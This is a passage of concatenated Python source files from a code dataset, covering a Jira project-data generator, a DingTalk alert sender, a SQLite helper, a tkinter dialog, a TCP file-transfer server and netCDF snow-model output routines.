end = find_markers(line, url_pos, \"[\", \"]\", make_sane=False)\n if start == -1 or end == -1:\n # Need to have both [ and ] to qualify for Jira link\n # markdown processing.\n start, end = find_markers(line, url_pos, \" \", \" \")\n # Now extract anything before 'start'\n if start != 0:\n result += line[:start]\n # Extract the url address - slicing doesn't\n # include the last character hence the +1\n addr = line[start:end+1]\n # and then remove that from the line.\n line = line[end+1:]\n result += htmlise_url(addr)\n return line, result\n\n\ndef htmlise_unordered_list(line):\n global nesting_level\n # Before we do anything else, if the current nesting\n # level is non-zero, close off the previous list entry.\n result = \"\"\n if nesting_level != 0:\n result = \"</li>\"\n # How many stars are there? We split on the first space\n # which should come after all of the stars.\n parts = line.split(\" \", 1)\n # We know that the first character is *, so we'll assume\n # that everything up to the space is also * and that is\n # our nesting level.\n level = len(parts[0])\n if nesting_level < level:\n # Start a new list\n result += \"<ul>\"\n elif nesting_level > level:\n # End the previous list. Note that we DON'T append this\n # (unlike starting a new list) because HTML requires\n # the list to end before the list entry is ended.\n result = \"</ul></li>\"\n # Now start this list entry\n result += \"<li>\"\n nesting_level = level\n return result + \" \" + htmlise_non_list_line(parts[1])\n\n\ndef htmlise_non_list_line(line):\n result = \"\"\n while True:\n at_pos = line.find(\"@\")\n url_pos = line.find(\"://\")\n # If no markers, return what is left\n if at_pos == -1 and url_pos == -1:\n return result+line\n if at_pos != -1 and url_pos != -1:\n # Which comes first?\n if at_pos < url_pos:\n line, result = process_email(at_pos, line, result)\n else:\n line, result = process_url(url_pos, line, result)\n elif at_pos != -1:\n line, result = process_email(at_pos, line, result)\n else:\n line, result = process_url(url_pos, line, result)\n\n\ndef htmlise_line(line):\n global nesting_level\n result = \"\"\n\n if line == \"\":\n return \"\"\n elif line[0] == \"*\":\n # If the line is part of an unordered list, process the list\n # part first and then process the rest of the line.\n return htmlise_unordered_list(line)\n elif nesting_level != 0:\n # We've got a non-list line and the nesting level is\n # non-zero, so decrement the nesting level and close off\n # a list.\n nesting_level -= 1\n result = \"</li></ul>\"\n return result + htmlise_non_list_line(line)\n\n\n\ndef htmlise_value(value):\n global nesting_level\n # The nesting level should already be zero because we\n # decrement it as the list ends but just in case ...\n nesting_level = 0\n\n # Break the value into lines. If there is only one\n # line then just process it straight away. Otherwise\n # HTMLise each line then add \"<br/>\" to the end of\n # all except the last one.\n parts = value.split(\"\n\")\n if len(parts) == 1:\n return htmlise_line(value.strip(\"\r\"))\n\n result = \"\"\n for p in parts:\n if result != \"\" and nesting_level == 0:\n result += \"<br/>\"\n result += htmlise_line(p.strip(\"\r\"))\n\n # Make sure we don't have an open list\n while nesting_level != 0:\n result += \"</li></ul>\"\n nesting_level -= 1\n return result\n\n\ndef construct_project_data(projects, metadata):\n results = []\n for p in projects:\n if p[\"key\"] in metadata:\n blob = construct_project_blob(p, metadata)\n results.append(blob)\n # Sort the projects by title\n results = sorted(results, key=lambda x: x[PI_SLUG][\"title\"])\n return {\n \"projects\": results\n }\n\n\ndef construct_project_blob(p, metadata):\n blob = {\n \"key\": p[\"key\"],\n \"icon\": p[\"avatarUrls\"][\"48x48\"]\n }\n meta = metadata[p[\"key\"]]\n property_list = meta_value(meta, \"property_visibility\", \"system\")\n properties = property_list.split('\n')\n # Now add the values\n for prop in properties:\n if \":\" in prop:\n parts = prop.split(\":\")\n value = meta_value(meta, parts[1], parts[0])\n if parts[0] not in blob:\n blob[parts[0]] = {}\n blob[parts[0]][parts[1]] = htmlise_value(value)\n # Finish off with the title and description from the project\n if PI_SLUG not in blob:\n blob[PI_SLUG] = {}\n blob[PI_SLUG][\"title\"] = htmlise_value(p[\"name\"])\n blob[PI_SLUG][\"description\"] = htmlise_value(p[\"description\"])\n return blob\n\ndef run_command(command):\n result = subprocess.run(\n command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n if result.returncode != 0:\n print(\"ERROR: '%s'\" % command)\n print(result.stdout.decode(\"utf-8\"))\n print(result.stderr.decode(\"utf-8\"))\n sys.exit(1)\n\n\ndef run_git_command(command):\n # We do some funky stuff around the git command processing because we want\n # to keep the SSH key under tight control.\n # See https://stackoverflow.com/a/4565746/1233830\n\n # Fetch the SSH key from Vault and store it in a temporary file\n with tempfile.NamedTemporaryFile(mode='w+', delete=False) as pem_file:\n pem = get_vault_secret(\"secret/misc/linaro-build-github.pem\")\n pem_file.write(pem)\n pkf = pem_file.name\n\n git_cmd = 'ssh-add \"%s\"; %s' % (pkf, command)\n full_cmd = \"ssh-agent bash -c '%s'\" % git_cmd\n run_command(full_cmd)\n os.remove(pkf)\n\n\ndef get_repo():\n repo_dir = \"%s/website\" % os.getenv(\"GITHUB_WORKSPACE\")\n os.chdir(repo_dir)\n run_git_command(\"git checkout master\")\n return Repo(repo_dir)\n\n\ndef checkin_repo(repo):\n repo_dir = \"%s/website\" % os.getenv(\"GITHUB_WORKSPACE\")\n os.chdir(repo_dir)\n # Only use run_git_command when we need the SSH key involved.\n run_command(\"git add --all\")\n run_command(\"git commit -m \\\"Update project data\\\"\")\n run_git_command(\n \"git push --set-upstream origin %s\" % repo.active_branch.name)\n\n\ndef check_repo_status(repo):\n # Add any untracked files to the repository\n untracked_files = repo.untracked_files\n for f in untracked_files:\n repo.git.add(f)\n # See if we have changed anything\n if repo.is_dirty():\n print(\"Checking in git repository changes\")\n checkin_repo(repo)\n else:\n print(\"No changes made to the git repository\")\n\n\ndef do_the_git_bits(data):\n repo = get_repo()\n working_dir = os.getenv(\"GITHUB_WORKSPACE\")\n sync_project_pages(data, \"%s/website/_pages/projects\" % working_dir)\n with open(\n \"%s/website/_data/projects.json\" % working_dir,\n \"w\"\n ) as json_file:\n json.dump(\n data,\n json_file,\n indent=4,\n sort_keys=True\n )\n check_repo_status(repo)\n\n\ndef check_project_dir_exists(key, projects_directory):\n path = \"%s/%s\" % (projects_directory, key.lower())\n if os.path.isdir(path):\n return\n 
os.makedirs(path)\n with open(\"%s/posts.md\" % path, \"w\") as posts_file:\n posts_file.write(\"---\\n\")\n posts_file.write(\"title: %s project posts\\n\" % key)\n posts_file.write(\"permalink: /projects/%s/posts/\\n\" % key.lower())\n posts_file.write(\"layout: related_project_posts\\n\")\n posts_file.write(\"key: %s\\n\" % key)\n posts_file.write(\"---\\n\")\n\n\ndef sync_project_pages(project_data, projects_directory):\n # Below _pages/projects, there is a directory for each project (lower-case name) and,\n # within that, a file called \"posts.md\" with this structure:\n #\n # ---\n # title: AI Project Posts\n # permalink: /projects/ai/posts/\n # layout: related_project_posts\n # key: AI\n # ---\n projects = project_data[\"projects\"]\n project_keys_lower = []\n for p in projects:\n check_project_dir_exists(p[\"key\"], projects_directory)\n project_keys_lower.append(p[\"key\"].lower())\n #\n # Remove any directories that exist for projects that don't ...\n subdirs = [f.name for f in os.scandir(projects_directory) if f.is_dir()]\n for s in subdirs:\n if s not in project_keys_lower:\n shutil.rmtree(\"%s/%s\" % (projects_directory, s))\n\n\ndef main():\n jira_auth = initialise_auth()\n jira_projects = get_all_projects(jira_auth)\n if len(jira_projects) == 0:\n print(\"Failed to retrieve any projects from Jira\")\n sys.exit(1)\n jira_metadata = get_metadata(jira_projects, jira_auth)\n # There seems to be a bug in the Jira REST API where getting all\n # projects does not include the description so, now we have a list\n # of the projects with metadata, re-fetch the Jira project info.\n jira_projects = get_specific_projects(jira_metadata, jira_auth)\n project_data = construct_project_data(jira_projects, jira_metadata)\n do_the_git_bits(project_data)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"generate_project_json.py","file_name":"generate_project_json.py","file_ext":"py","file_size_in_byte":15087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"533432586","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# 2019-7-3 Send Message to DingDing\n# Author: Deniss.wang\n\nimport sys\nimport json\nimport requests\n\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nops_dingdingd_token = '1'\naws_dingdingd_token = '2'\ndef SendMessage(msg):\n # AWS账单警报组钉钉机器人webhook\n aws_alert_url = 'https://oapi.dingtalk.com/robot/send?access_token=%s' % aws_dingdingd_token\n # OPS警报组钉钉机器人webhook\n ops_url = 'https://oapi.dingtalk.com/robot/send?access_token=%s' % ops_dingdingd_token\n HEADERS = {\n \"Content-Type\": \"application/json ;charset=utf-8 \"\n }\n message = \"%s \" % msg\n String_textMsg = { \\\n \"msgtype\": \"text\",\n \"text\": {\"content\": message},\n \"at\": {\n \"atMobiles\": [\n \"138\" #如果需要@某人,这里写他的手机号\n ],\n \"isAtAll\": 0 #如果需要@所有人,这些写1\n }\n }\n String_textMsg = json.dumps(String_textMsg)\n AWS_ALERT = requests.post(aws_alert_url, data=String_textMsg, headers=HEADERS)\n OPS_ALERT = requests.post(ops_url, data=String_textMsg, headers=HEADERS)\n print(AWS_ALERT.text,OPS_ALERT.text)\nif __name__ == '__main__':\n SendMessage(\"send dingding message\")\n","sub_path":"Python/DingDing.py","file_name":"DingDing.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"490242755","text":"from sqlite3 import Error, connect\nfrom bot.config import DB\nfrom bot.logger import logger\n\n\ndef exc(method):\n def wrapped(*args, **kwargs):\n\n try:\n 
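# Run the wrapped query; sqlite3.Error is logged and swallowed so the\n # caller sees None instead of an exception, e.g. dbc.get_count(\"no_such_table\")\n # simply returns None.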
result = method(*args, **kwargs)\n\n except Error as e:\n result = None\n logger.warning(e)\n\n return result\n return wrapped\n\n\nclass DBConnector(object):\n @exc\n def __init__(self):\n conn = connect(DB)\n self.cur = conn.cursor()\n\n @exc\n def get_last_id(self, _table):\n \"\"\" get id of the last table element \"\"\"\n query = f'select id from {_table} order by rowid desc limit 1;'\n id_tuple = self.cur.execute(query).fetchone()\n last_id = 0 if id_tuple is None else id_tuple[0]\n return last_id\n\n @exc\n def get_count(self, _table):\n \"\"\" get the amount of a table elements \"\"\"\n query = f'select count(*) from {_table};'\n count_tuple = self.cur.execute(query).fetchone()\n count = 0 if count_tuple is None else count_tuple[0]\n return count\n\n @exc\n def get_likes_in_period(self, _table='likes'):\n \"\"\" get likes from all users for a set period of time \"\"\"\n query = f'select count(*) from {_table};'\n count_tuple = self.cur.execute(query).fetchone()\n count = 0 if count_tuple is None else count_tuple[0]\n return count\n\n @exc\n def get_user_ids(self):\n \"\"\" get user Ids without superusers \"\"\"\n query = f'select id from \"auth_user\" where \"is_superuser\"==false;'\n ids_tuple = self.cur.execute(query).fetchall()\n ids = []\n\n for item in ids_tuple:\n ids.append(item[0])\n\n return ids\n\n @exc\n def get_not_own_post_ids(self, uid):\n \"\"\" get other user's posts Ids \"\"\"\n query = f'select id from \"sn_post\" where \"author_id\"!={uid};'\n ids_tuple = self.cur.execute(query).fetchall()\n ids = []\n\n for item in ids_tuple:\n ids.append(item[0])\n\n return ids\n\n @exc\n def get_user_post_amount(self, uid):\n \"\"\" get the amount of user posts \"\"\"\n query = f'select id from \"sn_post\" where \"author_id\"={uid};'\n ids_tuple = self.cur.execute(query).fetchall()\n amount = 0 if ids_tuple is None else len(ids_tuple)\n return amount\n\n @exc\n def get_user_like_amount(self, uid):\n \"\"\" get the amount of user likes \"\"\"\n query = f'select id from \"sn_like\" where \"user_id\"={uid};'\n ids_tuple = self.cur.execute(query).fetchall()\n amount = 0 if ids_tuple is None else len(ids_tuple)\n return amount\n\n @exc\n def get_user_dislike_amount(self, uid):\n \"\"\" get the amount of user dislikes \"\"\"\n query = f'select id from \"sn_dislike\" where \"user_id\"={uid};'\n ids_tuple = self.cur.execute(query).fetchall()\n amount = 0 if ids_tuple is None else len(ids_tuple)\n return amount\n\n @exc\n def get_user_last_post(self, uid):\n \"\"\" get date of the last user post \"\"\"\n query = f'select pub_date from \"sn_post\" where \"author_id\"={uid} order by pub_date desc limit 1;'\n date_tuple = self.cur.execute(query).fetchone()\n _date = None if date_tuple is None else date_tuple[0]\n return _date\n\n def get_user_last_like(self, uid):\n \"\"\" get date of the last user like \"\"\"\n query = f'select date from \"sn_like\" where \"user_id\"={uid} order by date desc limit 1;'\n date_tuple = self.cur.execute(query).fetchone()\n _date = None if date_tuple is None else date_tuple[0]\n return _date\n\n\ndbc = DBConnector()\n\nif __name__ == '__main__':\n \"\"\" Debug \"\"\"\n for tbl in ['auth_user', 'sn_post', 'sn_like', 'sn_dislike']:\n print(f'\\nTABLE \"{tbl}\"')\n print(dbc.cur.execute(f'pragma table_info({tbl});').fetchall())\n print(dbc.cur.execute(f'select * from {tbl};').fetchall())\n\n \"\"\" Tests \"\"\"\n print('\\ntests')\n print(f'get_user_ids():\\t\\t{dbc.get_user_ids()}')\n user_id = 1\n 
print(f'user_id={user_id}\\tget_not_own_post_ids():\\t\\t\\t{dbc.get_not_own_post_ids(uid=user_id)}')\n print(f'user_id={user_id}\\tget_user_post_amount():\\t{dbc.get_user_post_amount(uid=user_id)}')\n print(f'user_id={user_id}\\tget_user_like_amount():\\t{dbc.get_user_like_amount(uid=user_id)}')\n print(f'get_count for table \"sn_like\":\\t{dbc.get_count(\"sn_like\")}')\n print(f'user_id={user_id}\\tget_user_last_post for table \"sn_post\":\\t{dbc.get_user_last_post(uid=user_id)}')\n user_id = 6\n print(f'user_id={user_id}\\tget_user_last_like for table \"sn_like\":\\t{dbc.get_user_last_like(uid=user_id)}')\n\n user_id_list = dbc.get_user_ids()\n for user_id in user_id_list:\n print(f'user_id={user_id}\\tget_user_like_amount():\\t{dbc.get_user_like_amount(uid=user_id)}')\n","sub_path":"bot/db_connector.py","file_name":"db_connector.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"289526013","text":"#!/usr/bin/env python3\n\n#import needed packages\nimport tkinter as tk\nimport platform\nimport os\n\n#class definition\nclass BotMeWarning:\n\t\"\"\"Class for the Warning before BotMe starts\n\t needed packages:\n\n\t\timport tkinter (as tk)\n\t\timport platform\n\t\timport os\n\n\t\"\"\"\n\n\t#constructor\n\tdef __init__(self, master):\n\t\t\"\"\"Initiates the interface given an instance of tkinters tk.Tk()\n\t\t does not return anything\"\"\"\n\n\t\tself.master = master\n\t\tmaster.title(\"Warning\")\n\n\t\tself.warningContent = tk.Label(self.master, text=\"\\nPlease read the BotMe_README.txt/Documentation for proper\\nuse of this bot!\\n\", width=60)\n\t\tself.warningContent.grid(row=0, column=0, columnspan=3)\n\t\tself.warningAccepted = tk.Button(self.master, text=\"Understood!\", command=self.BotMeExtended)\n\t\tself.warningAccepted.grid(row=1, column=1)\n\n\t\tmaster.protocol(\"WM_DELETE_WINDOW\", self.BotMeExtended)\n\n\t#functions\n\tdef BotMeExtended(self):\n\t\t\"\"\"Calls the bot in \"pyBots/BotMe/BotMe.py\" using the os module\n\t\t does not return anything\"\"\"\n\n\t\tself.master.destroy()\n\t\tif \"Windows\" in platform.system():\n\t\t\tos.system(\"python pyBots/BotMe/BotMe.py\")\n\t\telse:\n\t\t\tos.system(\"pyBots/BotMe/BotMe.py\")\n\n#init gui\ndef main():\n\tinfoWarning = tk.Tk()\n\tapp = BotMeWarning(infoWarning)\n\tinfoWarning.mainloop()\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"bin/system/warnings/BotMeW.py","file_name":"BotMeW.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"633192966","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\nimport netCDF4 as nc\nimport glob\nfrom copy import copy\nfrom spatialnc.proj import add_proj\n\nC_TO_K = 273.16\nFREEZE = C_TO_K\n# Kelvin to Celcius\nK_TO_C = lambda x: x - FREEZE\n\n\ndef open_files_nc(myawsm):\n \"\"\"\n Open the netCDF files for initial conditions and inputs\n - Reads in the initial_conditions file\n - Required variables are x,y,z,z_0\n - The others z_s, rho, T_s_0, T_s, h2o_sat, mask can be specified\n but will be set to default of 0's or 1's for mask\n - Open the files for the inputs and store the file identifier\n\n Args:\n myawsm: awsm class\n Returns:\n force: dictionary of opened netCDF forcing data files\n\n \"\"\"\n # -------------------------------------------------------------------------\n # get the forcing data and open the file\n force = {}\n 
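# One read-only netCDF handle per forcing variable, keyed by variable\n # name; the handles stay open for the whole run and can be released\n # via close_files().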
force['thermal'] = nc.Dataset(os.path.join(myawsm.paths, 'thermal.nc'), 'r')\n force['air_temp'] = nc.Dataset(os.path.join(myawsm.paths, 'air_temp.nc'), 'r')\n force['vapor_pressure'] = nc.Dataset(os.path.join(myawsm.paths, 'vapor_pressure.nc'), 'r')\n force['wind_speed'] = nc.Dataset(os.path.join(myawsm.paths, 'wind_speed.nc'), 'r')\n force['net_solar'] = nc.Dataset(os.path.join(myawsm.paths, 'net_solar.nc'), 'r')\n\n # soil temp can either be distributed for set to a constant\n try:\n force['soil_temp'] = nc.Dataset(options['inputs']['soil_temp'], 'r')\n except:\n force['soil_temp'] = float(myawsm.soil_temp) * np.ones((myawsm.topo.ny,\n myawsm.topo.nx))\n\n force['precip_mass'] = nc.Dataset(os.path.join(myawsm.paths, 'precip.nc'), 'r')\n force['percent_snow'] = nc.Dataset(os.path.join(myawsm.paths, 'percent_snow.nc'), 'r')\n force['snow_density'] = nc.Dataset(os.path.join(myawsm.paths, 'snow_density.nc'), 'r')\n force['precip_temp'] = nc.Dataset(os.path.join(myawsm.paths, 'precip_temp.nc'), 'r')\n\n return force\n\n\ndef open_files_ipw(myawsm):\n \"\"\"\n Compile list of input data hours from ipw files stored in standard AWSM\n file structure. These are only list of integer water year hours, the actual\n reading of ipw files happens from the standard directory structure.\n\n Args:\n myawsm: awsm class\n\n Returns:\n ppt_list: list of hours for reference from the ppt_desc file\n input_list: list of input hours to read in from the data directory\n\n \"\"\"\n # ------------------------------------------------------------------------\n # get the forcing data and open the file\n # path to snow and em files\n path_inputs = os.path.join(myawsm.pathi, \"in.*\")\n # get precip from ipw\n header = ['hour', 'path']\n df_ppt = pd.read_csv(myawsm.ppt_desc, names=header, sep=' ')\n\n # get list of isnobal outputs and sort by time step\n input_files = sorted(glob.glob(path_inputs), key=os.path.getmtime)\n input_files.sort(key=lambda f: os.path.basename(f).split('in.')[1])\n\n ppt_list = np.zeros(len(df_ppt['path'].values))\n input_list = np.zeros(len(input_files))\n\n # store input and ppt hours in numpy arrays\n for idx, fl in enumerate(input_files):\n input_list[idx] = int(os.path.basename(fl).split('in.')[1])\n for idx, ppt_hr in enumerate(df_ppt['hour'].values):\n ppt_list[idx] = int(ppt_hr)\n\n return input_list, ppt_list\n\n\ndef close_files(force):\n \"\"\"\n Close input netCDF forcing files\n \"\"\"\n\n for f in force.keys():\n if not isinstance(force[f], np.ndarray):\n force[f].close()\n\n\ndef output_files(options, init, start_date, myawsm):\n \"\"\"\n Create the snow and em output netCDF file\n\n Args:\n options: dictionary of Snobal options\n init: dictionary of Snobal initialization images\n start_date: date for time units in files\n myawsm: awsm class\n\n \"\"\"\n fmt = '%Y-%m-%d %H:%M:%S'\n # chunk size\n cs = (6, 10, 10)\n if myawsm.topo.nx < 10:\n cs = (3, 3, 3)\n\n # ------------------------------------------------------------------------\n # EM netCDF\n m = {}\n m['name'] = ['net_rad', 'sensible_heat', 'latent_heat', 'snow_soil',\n 'precip_advected', 'sum_EB', 'evaporation', 'snowmelt',\n 'SWI', 'cold_content']\n m['units'] = ['W m-2', 'W m-2', 'W m-2', 'W m-2', 'W m-2', 'W m-2',\n 'kg m-2', 'kg m-2', 'kg or mm m-2', 'J m-2']\n m['description'] = ['Average net all-wave radiation',\n 'Average sensible heat transfer',\n 'Average latent heat exchange',\n 'Average snow/soil heat exchange',\n 'Average advected heat from precipitation',\n 'Average sum of EB terms for snowcover',\n 'Total 
evaporation',\n 'Total snowmelt',\n 'Total runoff',\n 'Snowcover cold content']\n\n emname = myawsm.em_name+'.nc'\n # if myawsm.restart_run:\n # emname = 'em_restart_{}.nc'.format(myawsm.restart_hr)\n # start_date = myawsm.restart_date\n\n netcdfFile = os.path.join(options['output']['location'], emname)\n\n if os.path.isfile(netcdfFile):\n myawsm._logger.warning(\n 'Opening {}, data may be overwritten!'.format(netcdfFile))\n em = nc.Dataset(netcdfFile, 'a')\n h = '[{}] Data added or updated'.format(\n datetime.now().strftime(fmt))\n setattr(em, 'last_modified', h)\n\n if 'projection' not in em.variables.keys():\n em = add_proj(em, None, myawsm.topo.topoConfig['filename'])\n\n else:\n em = nc.Dataset(netcdfFile, 'w')\n\n dimensions = ('time', 'y', 'x')\n\n # create the dimensions\n em.createDimension('time', None)\n em.createDimension('y', len(init['y']))\n em.createDimension('x', len(init['x']))\n\n # create some variables\n em.createVariable('time', 'f', dimensions[0])\n em.createVariable('y', 'f', dimensions[1])\n em.createVariable('x', 'f', dimensions[2])\n\n # setattr(em.variables['time'], 'units', 'hours since %s' % options['time']['start_date'])\n setattr(em.variables['time'], 'units', 'hours since %s' % start_date)\n setattr(em.variables['time'], 'time_zone', myawsm.tmz)\n setattr(em.variables['time'], 'calendar', 'standard')\n # setattr(em.variables['time'], 'time_zone', time_zone)\n em.variables['x'][:] = init['x']\n em.variables['y'][:] = init['y']\n\n # em image\n for i, v in enumerate(m['name']):\n # check to see if in output variables\n if v.lower() in myawsm.pysnobal_output_vars:\n # em.createVariable(v, 'f', dimensions[:3], chunksizes=(6,10,10))\n em.createVariable(v, 'f', dimensions[:3], chunksizes=cs)\n setattr(em.variables[v], 'units', m['units'][i])\n setattr(em.variables[v], 'description', m['description'][i])\n\n # add projection info\n em = add_proj(em, None, myawsm.topo.topoConfig['filename'])\n\n options['output']['em'] = em\n\n # ------------------------------------------------------------------------\n # SNOW netCDF\n\n s = {}\n s['name'] = ['thickness', 'snow_density', 'specific_mass', 'liquid_water',\n 'temp_surf', 'temp_lower', 'temp_snowcover',\n 'thickness_lower', 'water_saturation']\n s['units'] = ['m', 'kg m-3', 'kg m-2', 'kg m-2', 'C',\n 'C', 'C', 'm', 'percent']\n s['description'] = ['Predicted thickness of the snowcover',\n 'Predicted average snow density',\n 'Predicted specific mass of the snowcover',\n 'Predicted mass of liquid water in the snowcover',\n 'Predicted temperature of the surface layer',\n 'Predicted temperature of the lower layer',\n 'Predicted temperature of the snowcover',\n 'Predicted thickness of the lower layer',\n 'Predicted percentage of liquid water saturation of the snowcover']\n\n snowname = myawsm.snow_name + '.nc'\n # if myawsm.restart_run:\n # snowname = 'snow_restart_{}.nc'.format(myawsm.restart_hr)\n\n netcdfFile = os.path.join(options['output']['location'], snowname)\n\n if os.path.isfile(netcdfFile):\n myawsm._logger.warning(\n 'Opening {}, data may be overwritten!'.format(netcdfFile))\n snow = nc.Dataset(netcdfFile, 'a')\n h = '[{}] Data added or updated'.format(\n datetime.now().strftime(fmt))\n setattr(snow, 'last_modified', h)\n\n if 'projection' not in snow.variables.keys():\n snow = add_proj(snow, None, myawsm.topo.topoConfig['filename'])\n\n else:\n dimensions = ('time', 'y', 'x')\n\n snow = nc.Dataset(netcdfFile, 'w')\n\n # create the dimensions\n snow.createDimension('time', None)\n snow.createDimension('y', 
len(init['y']))\n snow.createDimension('x', len(init['x']))\n\n # create some variables\n snow.createVariable('time', 'f', dimensions[0])\n snow.createVariable('y', 'f', dimensions[1])\n snow.createVariable('x', 'f', dimensions[2])\n\n setattr(snow.variables['time'], 'units', 'hours since %s' % start_date)\n setattr(snow.variables['time'], 'time_zone', myawsm.tmz)\n setattr(snow.variables['time'], 'calendar', 'standard')\n # setattr(snow.variables['time'], 'time_zone', time_zone)\n snow.variables['x'][:] = init['x']\n snow.variables['y'][:] = init['y']\n\n # snow image\n for i, v in enumerate(s['name']):\n # check to see if in output variables\n if v.lower() in myawsm.pysnobal_output_vars:\n snow.createVariable(v, 'f', dimensions[:3], chunksizes=cs)\n # snow.createVariable(v, 'f', dimensions[:3])\n setattr(snow.variables[v], 'units', s['units'][i])\n setattr(snow.variables[v], 'description', s['description'][i])\n\n # add projection info\n snow = add_proj(snow, None, myawsm.topo.topoConfig['filename'])\n\n options['output']['snow'] = snow\n\n\ndef output_timestep(s, tstep, options, output_vars):\n \"\"\"\n Output the model results for the current time step\n\n Args:\n s: dictionary of output variable numpy arrays\n tstep: datetime time step\n options: dictionary of Snobal options\n\n \"\"\"\n\n em_out = {'net_rad': 'R_n_bar', 'sensible_heat': 'H_bar',\n 'latent_heat': 'L_v_E_bar',\n 'snow_soil': 'G_bar', 'precip_advected': 'M_bar',\n 'sum_EB': 'delta_Q_bar', 'evaporation': 'E_s_sum',\n 'snowmelt': 'melt_sum', 'SWI': 'ro_pred_sum',\n 'cold_content': 'cc_s'}\n snow_out = {'thickness': 'z_s', 'snow_density': 'rho',\n 'specific_mass': 'm_s', 'liquid_water': 'h2o',\n 'temp_surf': 'T_s_0', 'temp_lower': 'T_s_l',\n 'temp_snowcover': 'T_s', 'thickness_lower': 'z_s_l',\n 'water_saturation': 'h2o_sat'}\n\n # preallocate\n em = {}\n snow = {}\n\n # gather all the data together\n for key, value in em_out.items():\n em[key] = copy(s[value])\n\n for key, value in snow_out.items():\n snow[key] = copy(s[value])\n\n # convert from K to C\n snow['temp_snowcover'] -= FREEZE\n snow['temp_surf'] -= FREEZE\n snow['temp_lower'] -= FREEZE\n\n # now find the correct index\n # the current time integer\n times = options['output']['snow'].variables['time']\n # offset to match same convention as iSnobal\n tstep -= pd.to_timedelta(1, unit='h')\n t = nc.date2num(tstep.replace(tzinfo=None), times.units, times.calendar)\n\n if len(times) != 0:\n index = np.where(times[:] == t)[0]\n if index.size == 0:\n index = len(times)\n else:\n index = index[0]\n else:\n index = len(times)\n\n # insert the time\n options['output']['snow'].variables['time'][index] = t\n options['output']['em'].variables['time'][index] = t\n\n # insert the data\n for key in em_out:\n if key.lower() in output_vars:\n options['output']['em'].variables[key][index, :] = em[key]\n for key in snow_out:\n if key.lower() in output_vars:\n options['output']['snow'].variables[key][index, :] = snow[key]\n\n # sync to disk\n options['output']['snow'].sync()\n options['output']['em'].sync()\n","sub_path":"awsm/interface/pysnobal_io.py","file_name":"pysnobal_io.py","file_ext":"py","file_size_in_byte":12600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192467001","text":"import socket\nfrom threading import Thread\nfrom lib.common import UPLOAD, DOWNLOAD, socket_tcp, FileManager\n\n\nclass connection_instance:\n\n def __init__(self, cli, dir_path, printer):\n self.client = cli\n self.closed = False\n 
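# Each accepted client gets its own FileManager for opening and sizing\n # files, while the shared printer reports lifecycle and transfer stats\n # for the connection.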
self.printer = printer\n self.file_manager = FileManager(dir_path)\n printer.print_connection_established(cli.addr)\n\n # server side of the upload protocol\n def _server_upload_protocol(self):\n\n name = self.client.wait_for_name()\n size = self.client.wait_for_size()\n\n path = self.file_manager.SERVER_BASE_PATH + name\n file = self.file_manager.open_file(path=path, how='wb')\n self.client.recv_file(file, size)\n file.close()\n\n # server side of the download protocol\n def _server_download_protocol(self):\n\n path = self.client.wait_for_name()\n\n file = self.file_manager.open_file(path=path, how='rb')\n size = self.file_manager.get_size(file)\n self.client.send_size(size)\n\n self.client.send_file(file, size)\n file.close()\n\n # choose handler for the request\n def dispatch_request(self, request):\n if request == UPLOAD:\n self._server_upload_protocol()\n elif request == DOWNLOAD:\n self._server_download_protocol()\n else:\n raise(ConnectionAbortedError)\n\n # listen for what the client wants to do\n def listen_request(self):\n try:\n request = self.client.wait_for_request()\n request = self.dispatch_request(request)\n except (ConnectionAbortedError, ConnectionResetError,\n ValueError):\n self.printer.print_connection_aborted(printStackTrace=False)\n except FileNotFoundError:\n self.printer.print_file_not_found()\n finally:\n self._close()\n\n def run(self):\n self.thread = Thread(target=self.listen_request)\n self.thread.start()\n\n # closes the socket, for internal use only\n def _close(self):\n self.client.close()\n self.printer.print_connection_finished(self.client.addr)\n self.printer.print_connection_stats(self.client.bytes_sent,\n self.client.bytes_recv,\n self.client.time_alive)\n\n # closes the socket and joins the thread\n # for external use only\n def close(self):\n self._close()\n if self.thread:\n self.thread.join()\n self.thread = False\n\n # asks whether thread is done and joins it if necessary\n # for external use only\n def finished(self):\n if self.client.closed:\n self.close()\n return self.client.closed\n\n\ndef serve(host, port, dir_path, printer):\n addr = (host, port)\n active_connections = []\n\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.bind(addr)\n sock.listen(1)\n printer.print_listening_on(addr)\n\n while True:\n conn, addr = sock.accept()\n # cull list from dead connections\n active_connections[:] = [c for c in active_connections\n if not c.finished()]\n\n if not conn:\n break\n\n ci = connection_instance(socket_tcp(conn, addr), dir_path, printer)\n ci.run()\n active_connections.append(ci)\n\n except KeyboardInterrupt:\n\n if sock:\n sock.close()\n for cli in active_connections:\n cli.close()\n","sub_path":"tp1/src/lib/server_tcp.py","file_name":"server_tcp.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"533545073","text":"#!/usr/bin/python3\n\n\"\"\"\nWirelogd is a logging daemon for WireGuard.\n\nSince WireGuard itself does not log the state of its peers (and since it is UDP\nbased so, there no concept of \"connection state\"), Wirelogd relies on the\nlatest handshake to determine if a peer is active or inactive. While there is\ntrafic the handshake should be renewed every 2 minutes. If there is no trafic,\nhandshake is not renewed. 
